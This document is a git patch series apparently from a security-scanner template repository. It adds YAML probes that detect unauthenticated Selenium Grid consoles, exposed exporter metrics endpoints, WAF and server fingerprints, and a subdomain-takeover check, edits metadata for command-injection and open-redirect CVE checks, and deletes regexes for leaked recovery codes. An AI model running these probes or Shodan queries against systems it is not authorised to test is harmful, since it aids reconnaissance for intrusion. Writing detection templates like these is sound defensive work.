misconfiguration/unauth-selenium-grid.yaml | 25 ++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 misconfiguration/unauth-selenium-grid.yaml diff --git a/misconfiguration/unauth-selenium-grid.yaml b/misconfiguration/unauth-selenium-grid.yaml new file mode 100644 index 0000000000..c3eed1a32e --- /dev/null +++ b/misconfiguration/unauth-selenium-grid.yaml @@ -0,0 +1,25 @@ +id: unauth-selenium-grid + +info: + name: Unauthenticated Selenium Grid + author: pussycat0x + severity: high + metadata: + shodan-query: http.title:"Selenium Grid" + tags: misconfig,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}ui/index.html" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Selenium Grid" + condition: and + - type: status + status: + - 200 \ No newline at end of file From bd2c0795f891b95784b5cc3e1c017b56c01888d8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 18 Nov 2022 11:20:03 +0530 Subject: [PATCH 0423/1415] Create libvirt-exporter-metrics.yaml --- .../libvirt-exporter-metrics.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 misconfiguration/libvirt-exporter-metrics.yaml diff --git a/misconfiguration/libvirt-exporter-metrics.yaml b/misconfiguration/libvirt-exporter-metrics.yaml new file mode 100644 index 0000000000..cdf6ae047f --- /dev/null +++ b/misconfiguration/libvirt-exporter-metrics.yaml @@ -0,0 +1,28 @@ +id: libvirt-exporter-metrics + +info: + name: Detect Libvirt Exporter Metrics + author: DhiyaneshDk + severity: low + metadata: + verified: true + shodan-query: title:"Libvirt" + tags: libvirt,exposure,debug + +requests: + - method: GET + path: + - "{{BaseURL}}/metrics" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "libvirt_domains_number" + - "libvirt_up" + condition: and + + - type: status + status: + - 200 From 1ef61c74fbc9885d7c7648d828bffd959f1b3900 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 18 Nov 2022 11:24:56 +0530 Subject: [PATCH 0424/1415] Update unauth-selenium-grid.yaml --- misconfiguration/unauth-selenium-grid.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/misconfiguration/unauth-selenium-grid.yaml b/misconfiguration/unauth-selenium-grid.yaml index c3eed1a32e..774c6f7169 100644 --- a/misconfiguration/unauth-selenium-grid.yaml +++ b/misconfiguration/unauth-selenium-grid.yaml @@ -11,7 +11,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}ui/index.html" + - "{{BaseURL}}/ui/index.html" matchers-condition: and matchers: @@ -22,4 +22,4 @@ requests: condition: and - type: status status: - - 200 \ No newline at end of file + - 200 From e7892407f5adbca2d90625dd5332f749501cb805 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 18 Nov 2022 11:29:49 +0530 Subject: [PATCH 0425/1415] Add files via upload --- .../unauth-selenium-grid-console.yaml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 misconfiguration/unauth-selenium-grid-console.yaml diff --git a/misconfiguration/unauth-selenium-grid-console.yaml b/misconfiguration/unauth-selenium-grid-console.yaml new file mode 100644 index 0000000000..28299e31d8 --- /dev/null +++ b/misconfiguration/unauth-selenium-grid-console.yaml @@ -0,0 +1,25 @@ +id: unauth-selenium-grid-console + +info: + name: Unauthenticated Selenium Grid Console + author: pussycat0x + severity: high + tags: misconfig,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/grid/console" + - "{{BaseURL}}/console" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Grid Console" + - "view config" + condition: and + - type: status + status: + - 200 From 8acf09c3e52e7da36d379843b9ba28d8c9b08f24 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 18 Nov 2022 11:41:33 +0530 Subject: [PATCH 0426/1415] Create named-process-exporter-metrics.yaml --- .../named-process-exporter-metrics.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 misconfiguration/named-process-exporter-metrics.yaml diff --git a/misconfiguration/named-process-exporter-metrics.yaml b/misconfiguration/named-process-exporter-metrics.yaml new file mode 100644 index 0000000000..822555cf50 --- /dev/null +++ b/misconfiguration/named-process-exporter-metrics.yaml @@ -0,0 +1,28 @@ +id: named-process-exporter-metrics + +info: + name: Detect Named Process Exporter + author: DhiyaneshDk + severity: low + metadata: + verified: true + shodan-query: title:"Named Process Exporter" + tags: namedprocess,exposure,debug + +requests: + - method: GET + path: + - "{{BaseURL}}/metrics" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "namedprocess_namegroup" + - "groupname" + condition: and + + - type: status + status: + - 200 From 5d359c87b72ce7f295cb819892155c529be34e4a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 18 Nov 2022 12:15:31 +0530 Subject: [PATCH 0427/1415] Create rabbitmq-exporter-metrics.yaml --- .../rabbitmq-exporter-metrics.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 misconfiguration/rabbitmq-exporter-metrics.yaml diff --git a/misconfiguration/rabbitmq-exporter-metrics.yaml b/misconfiguration/rabbitmq-exporter-metrics.yaml new file mode 100644 index 0000000000..0e7e1bff3a --- /dev/null +++ b/misconfiguration/rabbitmq-exporter-metrics.yaml @@ -0,0 +1,28 @@ +id: rabbitmq-exporter-metrics + +info: + name: Detect RabbitMQ Exporter + author: DhiyaneshDk + severity: low + metadata: + verified: true + shodan-query: title:"RabbitMQ Exporter" + tags: rabbitmq,exposure,debug + +requests: + - method: GET + path: + - "{{BaseURL}}/metrics" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "rabbitmq_up" + - "rabbitmq_exporter_build_info" + condition: and + + - type: status + status: + - 200 From 8a7f7abdf32f4d01607a038c10398dcce51b70bf Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 18 Nov 2022 12:31:56 +0530 Subject: [PATCH 0428/1415] Create mysqld-exporter-metrics.yaml --- misconfiguration/mysqld-exporter-metrics.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 misconfiguration/mysqld-exporter-metrics.yaml diff --git a/misconfiguration/mysqld-exporter-metrics.yaml b/misconfiguration/mysqld-exporter-metrics.yaml new file mode 100644 index 0000000000..ab501d41cc --- /dev/null +++ b/misconfiguration/mysqld-exporter-metrics.yaml @@ -0,0 +1,28 @@ +id: mysqld-exporter-metrics + +info: + name: Detect MySQLd Exporter + author: DhiyaneshDk + severity: low + metadata: + verified: true + shodan-query: title:"MySQLd exporter" + tags: mysqld,exposure,debug + +requests: + - method: GET + path: + - "{{BaseURL}}/metrics" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "mysql_up" + - "mysqld_exporter_build_info" + condition: and + + - type: status + status: + - 200 From 3b1269458378ac2f086aa771bcaa3715e03815da Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 18 Nov 2022 13:33:49 +0530 Subject: [PATCH 0429/1415] Add files via upload --- .../mongodb-exporter-metrics.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 misconfiguration/mongodb-exporter-metrics.yaml diff --git a/misconfiguration/mongodb-exporter-metrics.yaml b/misconfiguration/mongodb-exporter-metrics.yaml new file mode 100644 index 0000000000..a54d4c217d --- /dev/null +++ b/misconfiguration/mongodb-exporter-metrics.yaml @@ -0,0 +1,28 @@ +id: mongodb-exporter-metrics + +info: + name: Detect MongoDB Exporter + author: pussycat0x + severity: low + metadata: + verified: true + shodan-query: title:"mongodb exporter" + tags: mongodb,exposure,debug + +requests: + - method: GET + path: + - "{{BaseURL}}/metrics" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "mongodb_mongod" + - "mongodb_mongod_instance_uptime" + condition: and + + - type: status + status: + - 200 From db1113e37fd0ceb688137a3b707cdb8366392578 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Fri, 18 Nov 2022 13:42:08 +0530 Subject: [PATCH 0430/1415] Add files via upload --- .../haproxy-exporter-metrics.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 misconfiguration/haproxy-exporter-metrics.yaml diff --git a/misconfiguration/haproxy-exporter-metrics.yaml b/misconfiguration/haproxy-exporter-metrics.yaml new file mode 100644 index 0000000000..115f1a6cb8 --- /dev/null +++ b/misconfiguration/haproxy-exporter-metrics.yaml @@ -0,0 +1,28 @@ +id: haproxy-exporter-metrics + +info: + name: Detect Haproxy Exporter + author: pussycat0x + severity: low + metadata: + verified: true + shodan-query: title:"haproxy exporter" + tags: haproxy,exposure,debug + +requests: + - method: GET + path: + - "{{BaseURL}}/metrics" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "haproxy_exporter" + - "haproxy_up" + condition: and + + - type: status + status: + - 200 \ No newline at end of file From ea72afb9977bc70b6be31d66e903a191d9318ac9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 18 Nov 2022 13:49:07 +0530 Subject: [PATCH 0431/1415] Update CVE-2022-40881.yaml --- cves/2022/CVE-2022-40881.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-40881.yaml b/cves/2022/CVE-2022-40881.yaml index b9b8ed9613..ed0b04a00b 100644 --- a/cves/2022/CVE-2022-40881.yaml +++ b/cves/2022/CVE-2022-40881.yaml @@ -1,16 +1,19 @@ id: CVE-2022-40881 info: - name: SolarView - Remote Command Execution + name: SolarView 6.00 - Remote Command Execution author: For3stCo1d severity: critical description: | SolarView Compact 6.00 was discovered to contain a command injection vulnerability via network_test.php reference: - https://github.com/Timorlover/SolarView_Compact_6.0_rce_via_network_test.php - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40881 - https://github.com/advisories/GHSA-wx3r-88rg-whxq + - https://nvd.nist.gov/vuln/detail/CVE-2022-40881 + classification: + cve-id: CVE-2022-40881 metadata: + verified: true shodan-query: http.favicon.hash:"-244067125" tags: cve,cve2022,solarview,rce,lfi From 3ea3a33cdb8d30052d5393379acdf102cb5f39c3 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 18 Nov 2022 08:20:51 +0000 Subject: [PATCH 0432/1415] Auto Generated New Template Addition List [Fri Nov 18 08:20:50 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 2d93ba62fe..b75b754d44 100644 --- a/.new-additions +++ b/.new-additions @@ -8,6 +8,7 @@ cves/2022/CVE-2022-1442.yaml cves/2022/CVE-2022-2379.yaml cves/2022/CVE-2022-3484.yaml cves/2022/CVE-2022-3578.yaml +cves/2022/CVE-2022-40881.yaml default-logins/tooljet/tooljet-default-login.yaml exposed-panels/apache-jmeter-dashboard.yaml exposed-panels/opencpu-panel.yaml From 5dd949f466604ff18d69ffd486de2e3b7f0fc798 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 18 Nov 2022 13:53:19 +0530 Subject: [PATCH 0433/1415] Create collectd-exporter-metrics.yaml --- .../collectd-exporter-metrics.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 misconfiguration/collectd-exporter-metrics.yaml diff --git a/misconfiguration/collectd-exporter-metrics.yaml b/misconfiguration/collectd-exporter-metrics.yaml new file mode 100644 index 0000000000..55bf65a2d9 --- /dev/null +++ b/misconfiguration/collectd-exporter-metrics.yaml @@ -0,0 +1,28 @@ +id: collectd-exporter-metrics + +info: + name: Detect Collectd Exporter + author: DhiyaneshDk + severity: low + metadata: + verified: true + shodan-query: title:"Collectd Exporter" + tags: collectd,exposure,debug + +requests: + - method: GET + path: + - "{{BaseURL}}/metrics" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "collectd_cpu_percent" + - "collectd_exporter_build_info" + condition: and + + - type: status + status: + - 200 From e2df5d326007ea6830b9b8c3e5623e934638d597 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 18 Nov 2022 13:58:26 +0530 Subject: [PATCH 0434/1415] Update mongodb-exporter-metrics.yaml --- misconfiguration/mongodb-exporter-metrics.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/mongodb-exporter-metrics.yaml b/misconfiguration/mongodb-exporter-metrics.yaml index a54d4c217d..0701a28e0e 100644 --- a/misconfiguration/mongodb-exporter-metrics.yaml +++ b/misconfiguration/mongodb-exporter-metrics.yaml @@ -20,7 +20,7 @@ requests: part: body words: - "mongodb_mongod" - - "mongodb_mongod_instance_uptime" + - "mongodb_up" condition: and - type: status From f13f00a9659cdd56a91eb19a48f9d1b931475690 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 18 Nov 2022 13:59:42 +0530 Subject: [PATCH 0435/1415] Update mongodb-exporter-metrics.yaml --- misconfiguration/mongodb-exporter-metrics.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/misconfiguration/mongodb-exporter-metrics.yaml b/misconfiguration/mongodb-exporter-metrics.yaml index 0701a28e0e..8657244d73 100644 --- a/misconfiguration/mongodb-exporter-metrics.yaml +++ b/misconfiguration/mongodb-exporter-metrics.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: low metadata: - verified: true - shodan-query: title:"mongodb exporter" + verified: "true" + shodan-query: title:"MongoDB exporter" tags: mongodb,exposure,debug requests: @@ -19,8 +19,8 @@ requests: - type: word part: body words: - - "mongodb_mongod" - "mongodb_up" + - "mongodb_exporter_build_info" condition: and - type: status From 5c75406de1b1a59968e88ef65deb65fa4b655ffc Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 18 Nov 2022 14:05:50 +0530 Subject: [PATCH 0437/1415] Update haproxy-exporter-metrics.yaml --- misconfiguration/haproxy-exporter-metrics.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/misconfiguration/haproxy-exporter-metrics.yaml b/misconfiguration/haproxy-exporter-metrics.yaml index 115f1a6cb8..b089ab156f 100644 --- a/misconfiguration/haproxy-exporter-metrics.yaml +++ b/misconfiguration/haproxy-exporter-metrics.yaml @@ -23,6 +23,11 @@ requests: - "haproxy_up" condition: and + - type: word + part: header + words: + - text/plain + - type: status status: - - 200 \ No newline at end of file + - 200 From b59f626b7c8001fa735e88796648202ad90afcf6 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 18 Nov 2022 08:36:44 +0000 Subject: [PATCH 0438/1415] Auto Generated New Template Addition List [Fri Nov 18 08:36:44 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b75b754d44..96fae78883 100644 --- a/.new-additions +++ b/.new-additions @@ -19,6 +19,7 @@ exposures/files/apache-licenserc.yaml iot/pqube-power-analyzers.yaml misconfiguration/docmosis-tornado-server.yaml misconfiguration/installer/tasmota-install.yaml +misconfiguration/pcdn-cache-node.yaml misconfiguration/phpmemcached-admin-panel.yaml misconfiguration/tasmota-config-webui.yaml misconfiguration/typo3-debug-mode.yaml From bad8d2b944e72d86014c237a98f26f1f900accf4 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 18 Nov 2022 14:21:09 +0530 Subject: [PATCH 0439/1415] Update haproxy-exporter-metrics.yaml --- misconfiguration/haproxy-exporter-metrics.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/misconfiguration/haproxy-exporter-metrics.yaml b/misconfiguration/haproxy-exporter-metrics.yaml index b089ab156f..71c0970c54 100644 --- a/misconfiguration/haproxy-exporter-metrics.yaml +++ b/misconfiguration/haproxy-exporter-metrics.yaml @@ -19,14 +19,14 @@ requests: - type: word part: body words: - - "haproxy_exporter" - - "haproxy_up" - condition: and + - "HELP haproxy_" - type: word - part: header + part: body words: - - text/plain + - "haproxy_exporter" + - "haproxy_backend" + condition: or - type: status status: From c5b8085b9aa608b68d5fbd0e11bae3b0e8444854 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 18 Nov 2022 08:53:39 +0000 Subject: [PATCH 0440/1415] Auto Generated New Template Addition List [Fri Nov 18 08:53:39 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 96fae78883..f076d4ba8e 100644 --- a/.new-additions +++ b/.new-additions @@ -18,6 +18,7 @@ exposed-panels/xibocms-login.yaml exposures/files/apache-licenserc.yaml iot/pqube-power-analyzers.yaml misconfiguration/docmosis-tornado-server.yaml +misconfiguration/haproxy-exporter-metrics.yaml misconfiguration/installer/tasmota-install.yaml misconfiguration/pcdn-cache-node.yaml misconfiguration/phpmemcached-admin-panel.yaml From c16a55bbfc53fd7dd7e3fa2caebc79e3d565e5b9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 18 Nov 2022 15:01:56 +0530 Subject: [PATCH 0441/1415] Create lvm-exporter-metrics.yaml --- misconfiguration/lvm-exporter-metrics.yaml | 33 ++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 misconfiguration/lvm-exporter-metrics.yaml diff --git a/misconfiguration/lvm-exporter-metrics.yaml b/misconfiguration/lvm-exporter-metrics.yaml new file mode 100644 index 0000000000..45a3cd7870 --- /dev/null +++ b/misconfiguration/lvm-exporter-metrics.yaml @@ -0,0 +1,33 @@ +id: lvm-exporter-metrics + +info: + name: Detect LVM Exporter + author: DhiyaneshDk + severity: low + metadata: + verified: true + shodan-query: title:"LVM Exporter" + tags: lvm,exposure,debug + +requests: + - method: GET + path: + - "{{BaseURL}}/metrics" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "HELP lvm_lv" + + - type: word + part: body + words: + - "lvm_lv_health_status" + - "lvm_lv_permission" + condition: or + + - type: status + status: + - 200 From 88a84715484b2dcbfb9a0c93bd01371bf349d917 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 18 Nov 2022 15:50:42 +0530 Subject: [PATCH 0442/1415] Create blackbox-exporter-metrics.yaml --- .../blackbox-exporter-metrics.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 misconfiguration/blackbox-exporter-metrics.yaml diff --git a/misconfiguration/blackbox-exporter-metrics.yaml b/misconfiguration/blackbox-exporter-metrics.yaml new file mode 100644 index 0000000000..3aa07af5a3 --- /dev/null +++ b/misconfiguration/blackbox-exporter-metrics.yaml @@ -0,0 +1,27 @@ +id: blackbox-exporter-metrics + +info: + name: Detect Blackbox Exporter + author: DhiyaneshDk + severity: low + metadata: + verified: true + shodan-query: title:"Blackbox Exporter" + tags: blackbox,exposure,debug + +requests: + - method: GET + path: + - "{{BaseURL}}/metrics" + + matchers-condition: or + matchers: + - type: word + part: body + words: + - "Blackbox exporter" + - "blackbox_exporter_build_info" + + - type: status + status: + - 200 From 52cd3dd2f450a92b5f1c5175cfe30974c22561a7 Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Fri, 18 Nov 2022 06:14:08 -0500 Subject: [PATCH 0443/1415] Update hubspot-takeover.yaml (#6090) --- takeovers/hubspot-takeover.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/takeovers/hubspot-takeover.yaml b/takeovers/hubspot-takeover.yaml index 56b3143323..b7330538d1 100644 --- a/takeovers/hubspot-takeover.yaml +++ b/takeovers/hubspot-takeover.yaml @@ -5,7 +5,8 @@ info: author: pdteam severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/59 + - https://hackerone.com/reports/335330 tags: takeover,hubspot requests: From 6a2000ede87bc366bcb1c38ac4fbb48c8f364464 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 18 Nov 2022 11:29:33 +0000 Subject: [PATCH 0445/1415] Auto Generated CVE annotations [Fri Nov 18 11:29:33 UTC 2022] :robot: --- takeovers/hubspot-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/hubspot-takeover.yaml b/takeovers/hubspot-takeover.yaml index b7330538d1..e8e59c0ca5 100644 --- a/takeovers/hubspot-takeover.yaml +++ b/takeovers/hubspot-takeover.yaml @@ -7,7 +7,7 @@ info: reference: - https://github.com/EdOverflow/can-i-take-over-xyz/issues/59 - https://hackerone.com/reports/335330 - tags: takeover,hubspot + tags: takeover,hubspot,hackerone requests: - method: GET From d0cbf7cdb95c7a6b909fae5fa761c2ff2a9b443a Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 18 Nov 2022 19:30:41 +0700 Subject: [PATCH 0446/1415] Create payara-micro-server-detect.yaml --- technologies/payara-micro-server-detect.yaml | 21 ++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 technologies/payara-micro-server-detect.yaml diff --git a/technologies/payara-micro-server-detect.yaml b/technologies/payara-micro-server-detect.yaml new file mode 100644 index 0000000000..98389a6346 --- /dev/null +++ b/technologies/payara-micro-server-detect.yaml @@ -0,0 +1,21 @@ +id: payara-micro-detect + +info: + name: Payara Micro Detect + author: pikpikcu + severity: info + metadata: + shodan-query: app="paYara-Micro-Server" + tags: tech,payara + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "><title>Payara Micro #badassfish - Error report" From e9b1781865cefd0523546daf30455776fe8b24db Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 18 Nov 2022 19:31:25 +0700 Subject: [PATCH 0447/1415] Update payara-micro-server-detect.yaml --- technologies/payara-micro-server-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/payara-micro-server-detect.yaml b/technologies/payara-micro-server-detect.yaml index 98389a6346..821cb60a22 100644 --- a/technologies/payara-micro-server-detect.yaml +++ b/technologies/payara-micro-server-detect.yaml @@ -18,4 +18,4 @@ requests: - type: word part: body words: - - ">Payara Micro #badassfish - Error report" + - "Payara Micro #badassfish - Error report" From cf21bb7db1b43441c31d512d53ad57c1892654ff Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 18 Nov 2022 18:22:02 +0530 Subject: [PATCH 0448/1415] Update secui-waf-detect.yaml --- technologies/secui-waf-detect.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/technologies/secui-waf-detect.yaml b/technologies/secui-waf-detect.yaml index 6640ea70c1..25ca56cbd4 100644 --- a/technologies/secui-waf-detect.yaml +++ b/technologies/secui-waf-detect.yaml @@ -1,17 +1,20 @@ id: secui-waf-detect info: - name: SECUI WAF Detection + name: SECUI WAF Detect author: gy741 severity: info reference: - https://www.secui.com/en/network/bluemaxng + metadata: + verified: true + shodan-query: http.favicon.hash:-1101206929 tags: tech,panel,secui requests: - method: GET path: - - "{{BaseURL}}/resource/assets/img/favicon.ico" + - "{{BaseURL}}/static/login/favicon.ico" matchers: - type: dsl From 75ec2db0123021b9d98fa9836c50504b793069ed Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 18 Nov 2022 13:07:35 +0000 Subject: [PATCH 0449/1415] Auto Generated New Template Addition List [Fri Nov 18 13:07:35 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f076d4ba8e..30152cb589 100644 --- a/.new-additions +++ b/.new-additions @@ -30,6 +30,7 @@ network/detection/esmtp-detect.yaml network/detection/imap-detect.yaml network/detection/pop3-detect.yaml network/detection/telnet-detect.yaml +technologies/secui-waf-detect.yaml technologies/sogo-detect.yaml technologies/tornado-server-login.yaml vulnerabilities/opencpu/opencpu-rce.yaml From e5406841318f57b85f90925964641c20252a56a5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 18 Nov 2022 18:55:47 +0530 Subject: [PATCH 0450/1415] Delete discord-backup-code.yaml --- file/keys/discord-backup-code.yaml | 16 ---------------- 1 file changed, 16 deletions(-) delete mode 100644 file/keys/discord-backup-code.yaml diff --git a/file/keys/discord-backup-code.yaml b/file/keys/discord-backup-code.yaml deleted file mode 100644 index cfdff5c702..0000000000 --- a/file/keys/discord-backup-code.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: discord-backup-code - -info: - name: Discord Backup Code - author: geeknik - severity: high - tags: discord,code,file - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - '[0-9A-Za-z]{4}\-[0-9A-Za-z]{4}' From c953b64dafc82e0d1292fa0ab131c0af2c28465b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 18 Nov 2022 18:56:03 +0530 Subject: [PATCH 0451/1415] Delete gitlab-recovery-code.yaml --- file/keys/gitlab-recovery-code.yaml | 16 ---------------- 1 file changed, 16 deletions(-) delete mode 100644 file/keys/gitlab-recovery-code.yaml diff --git a/file/keys/gitlab-recovery-code.yaml b/file/keys/gitlab-recovery-code.yaml deleted file mode 100644 index 8850e21664..0000000000 --- a/file/keys/gitlab-recovery-code.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: gitlab-recovery-code - -info: - name: Github Recovery Code - author: geeknik - severity: high - tags: gitlab,recovery,token,file - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - '[0-9A-Za-z]{16}' From f9a45a3141327e3d978b9c8ab9c8df7ce8261cf7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 18 Nov 2022 13:28:38 +0000 Subject: [PATCH 0452/1415] Auto Generated New Template Addition List [Fri Nov 18 13:28:38 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 30152cb589..a1921af7e9 100644 --- a/.new-additions +++ b/.new-additions @@ -16,6 +16,7 @@ exposed-panels/tekton-dashboard.yaml exposed-panels/wagtail-cms-detect.yaml exposed-panels/xibocms-login.yaml exposures/files/apache-licenserc.yaml +file/keys/github-recovery-code.yaml iot/pqube-power-analyzers.yaml misconfiguration/docmosis-tornado-server.yaml misconfiguration/haproxy-exporter-metrics.yaml From bf0f7ccf189a66ef454e180c83a0f822f476f22f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 18 Nov 2022 19:01:02 +0530 Subject: [PATCH 0453/1415] Update CVE-2020-13121.yaml --- cves/2020/CVE-2020-13121.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/cves/2020/CVE-2020-13121.yaml b/cves/2020/CVE-2020-13121.yaml index 01629177cf..85e6f703ba 100644 --- a/cves/2020/CVE-2020-13121.yaml +++ b/cves/2020/CVE-2020-13121.yaml @@ -27,9 +27,8 @@ requests: user_id={{username}}&password={{password}}&stay_logged_in=on&login=Login cookie-reuse: true - matchers-condition: and matchers: - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 From 2f7215ca1e3f198007733559b97244bf1c88df31 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 18 Nov 2022 13:34:02 +0000 Subject: [PATCH 0454/1415] Auto Generated New Template Addition List [Fri Nov 18 13:34:01 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a1921af7e9..5f691446a3 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +cves/2020/CVE-2020-13121.yaml cves/2020/CVE-2020-21012.yaml cves/2020/CVE-2020-24902.yaml cves/2020/CVE-2020-24903.yaml From b3700dae42702b5a047688fa76307751b855f16a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 18 Nov 2022 19:16:56 +0530 Subject: [PATCH 0455/1415] Update unauth-selenium-grid-console.yaml --- misconfiguration/unauth-selenium-grid-console.yaml | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/misconfiguration/unauth-selenium-grid-console.yaml b/misconfiguration/unauth-selenium-grid-console.yaml index 28299e31d8..e38172cfb9 100644 --- a/misconfiguration/unauth-selenium-grid-console.yaml +++ b/misconfiguration/unauth-selenium-grid-console.yaml @@ -1,10 +1,12 @@ id: unauth-selenium-grid-console info: - name: Unauthenticated Selenium Grid Console + name: Unauthenticated Selenium Grid Console author: pussycat0x - severity: high - tags: misconfig,unauth + severity: info + metadata: + verified: true + tags: misconfig,unauth,selenium requests: - method: GET @@ -12,6 +14,7 @@ requests: - "{{BaseURL}}/grid/console" - "{{BaseURL}}/console" + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -20,6 +23,7 @@ requests: - "Grid Console" - "view config" condition: and + - type: status status: - 200 From 703d24619d57511a9352f1dbf087477e9b866886 Mon Sep 17 00:00:00 2001 From: 